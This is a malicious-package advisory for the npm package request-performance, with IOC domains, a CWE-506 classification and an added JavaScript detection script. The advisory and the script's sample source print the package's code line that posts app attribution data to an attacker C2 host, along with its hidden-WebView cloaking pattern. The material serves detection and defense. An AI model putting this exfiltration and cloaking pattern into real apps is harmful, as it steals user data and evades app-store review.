MAL-2026-6175
Vulnerability from ossf_malicious_packages
The npm package request-performance (published by npm user sproger, slavatopbuyer@gmail.com) is a deceptive React Native component and part of a coordinated 37-package campaign across two attacker-controlled domains (surrprisingcoompanny.lol and barbellmate.xyz). On component mount it registers appsFlyer.onInstallConversionData and exfiltrates the app's install/conversion attribution data via axios.post("https://surrprisingcoompanny.lol", data), fetches a remote-config URL, and renders it full-screen in a react-native-webview that is hidden (display:'none') unless the server returns a valid URL — i.e. App Store review-evasion / attribution-laundering ('cloaking'). The package name is a decoy unrelated to its actual function, and the real logic is concealed behind junk 'calculator' functions with Ukrainian-language comments. Indicators of compromise: C2 surrprisingcoompanny.lol, barbellmate.xyz; npm author sproger. Both C2 domains are currently unregistered (dangling-C2 takeover risk for any app still shipping these packages). Reproducible from the published tarball, e.g. socket-network@1.0.0 SocketComponent*.jsx: appsFlyer.onInstallConversionData(...) -> axios.post("https://surrprisingcoompanny.lol", data); axios.get(fLink) remote config; hidden `<WebView source={{uri: techResult}}>` gated on display:'none'/'flex'.
- CWE-506 - The product contains code that appears to be malicious in nature.
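The description above names three signals that only make sense together: an AppsFlyer attribution listener, an axios.post to an unexpected host, and a WebView whose display is toggled between 'none' and 'flex'. The following added triage script (not code from the advisory, the finder, or the packages it describes) checks React Native source text for that co-occurrence; the allowlist host, the function names and the two sample sources are constructed for the demo, and only the C2 hostname comes from the advisory.

```javascript
// Added detection example, not code from the advisory or the packages it
// describes. It statically triages React Native source text for the
// co-occurrence the advisory names: an appsFlyer.onInstallConversionData
// listener, an axios.post to a host outside an allowlist, and a WebView
// whose display toggles between 'none' and 'flex'. Allowlist and samples
// are constructed for this demo; the C2 host comes from the advisory.
const ALLOWED_HOSTS = new Set(["api.example.com"]); // assumed first-party host

// Hostnames passed as the first argument of axios.post("<url>", ...).
function postTargets(src) {
  const re = /axios\.post\(\s*["'`](https?:\/\/[^\/"'`]+)/g;
  const hosts = [];
  let m;
  while ((m = re.exec(src)) !== null) hosts.push(new URL(m[1]).hostname);
  return hosts;
}

// Returns the signals found in one file and whether all three co-occur.
function triageSource(name, src) {
  const attributionHook = /appsFlyer\.onInstallConversionData\s*\(/.test(src);
  const unknownHosts = postTargets(src).filter((h) => !ALLOWED_HOSTS.has(h));
  const hiddenWebView =
    /<WebView\b/.test(src) &&
    /display:\s*[^,}\n]*['"]none['"]/.test(src) &&
    /['"]flex['"]/.test(src);
  const suspicious = attributionHook && unknownHosts.length > 0 && hiddenWebView;
  return { name, attributionHook, unknownHosts, hiddenWebView, suspicious };
}

// Constructed samples: the first mirrors the component the advisory describes,
// the second is a benign component that uses the same libraries.
const SAMPLES = {
  "SocketComponent.jsx": `
    useEffect(() => {
      appsFlyer.onInstallConversionData((data) => {
        axios.post("https://surrprisingcoompanny.lol", data);
      });
      axios.get(fLink).then((r) => setTechResult(r.data));
    }, []);
    return <WebView source={{uri: techResult}}
      style={{display: techResult ? 'flex' : 'none'}} />;`,
  "Analytics.jsx": `
    appsFlyer.onInstallConversionData((data) => {
      axios.post("https://api.example.com/attribution", data);
    });`,
};

function triageAll(samples = SAMPLES) {
  return Object.entries(samples).map(([name, src]) => triageSource(name, src));
}
```

Point `triageAll` at the `.js`/`.jsx` files under `node_modules` of an app to find components that match; a hit on only one signal is not by itself a finding.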
{
"affected": [
{
"database_specific": {
"cwes": [
{
"cweId": "CWE-506",
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code"
}
]
},
"package": {
"ecosystem": "npm",
"name": "request-performance"
},
"ranges": [
{
"events": [
{
"introduced": "0"
}
],
"type": "SEMVER"
}
],
"versions": [
"1.0.0"
]
}
],
"credits": [
{
"contact": [
"https://westbayberry.com",
"https://github.com/ComCat1"
],
"name": "WestBayBerry / dependency-guardian",
"type": "FINDER"
}
],
"database_specific": {
"iocs": {
"domains": [
"surrprisingcoompanny.lol",
"barbellmate.xyz"
]
},
"malicious-packages-origins": null
},
"details": "The npm package `request-performance` (published by npm user `sproger`, slavatopbuyer@gmail.com) is a deceptive React Native component and part of a coordinated 37-package campaign across two attacker-controlled domains (surrprisingcoompanny.lol and barbellmate.xyz). On component mount it registers `appsFlyer.onInstallConversionData` and exfiltrates the app\u0027s install/conversion attribution data via `axios.post(\"https://surrprisingcoompanny.lol\", data)`, fetches a remote-config URL, and renders it full-screen in a `react-native-webview` that is hidden (display:\u0027none\u0027) unless the server returns a valid URL \u2014 i.e. App Store review-evasion / attribution-laundering (\u0027cloaking\u0027). The package name is a decoy unrelated to its actual function, and the real logic is concealed behind junk \u0027calculator\u0027 functions with Ukrainian-language comments. Indicators of compromise: C2 surrprisingcoompanny.lol, barbellmate.xyz; npm author `sproger`. Both C2 domains are currently unregistered (dangling-C2 takeover risk for any app still shipping these packages). Reproducible from the published tarball, e.g. socket-network@1.0.0 SocketComponent*.jsx: appsFlyer.onInstallConversionData(...) -\u003e axios.post(\"https://surrprisingcoompanny.lol\", data); axios.get(fLink) remote config; hidden \u003cWebView source={{uri: techResult}}\u003e gated on display:\u0027none\u0027/\u0027flex\u0027.",
"id": "MAL-2026-6175",
"modified": "2026-06-17T12:00:00Z",
"published": "2026-06-17T12:00:00Z",
"references": [
{
"type": "PACKAGE",
"url": "https://www.npmjs.com/package/request-performance"
}
],
"schema_version": "1.7.4",
"summary": "Malicious code in request-performance (npm)"
}
Sightings
| Author | Source | Type | Date | Other |
|---|---|---|---|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.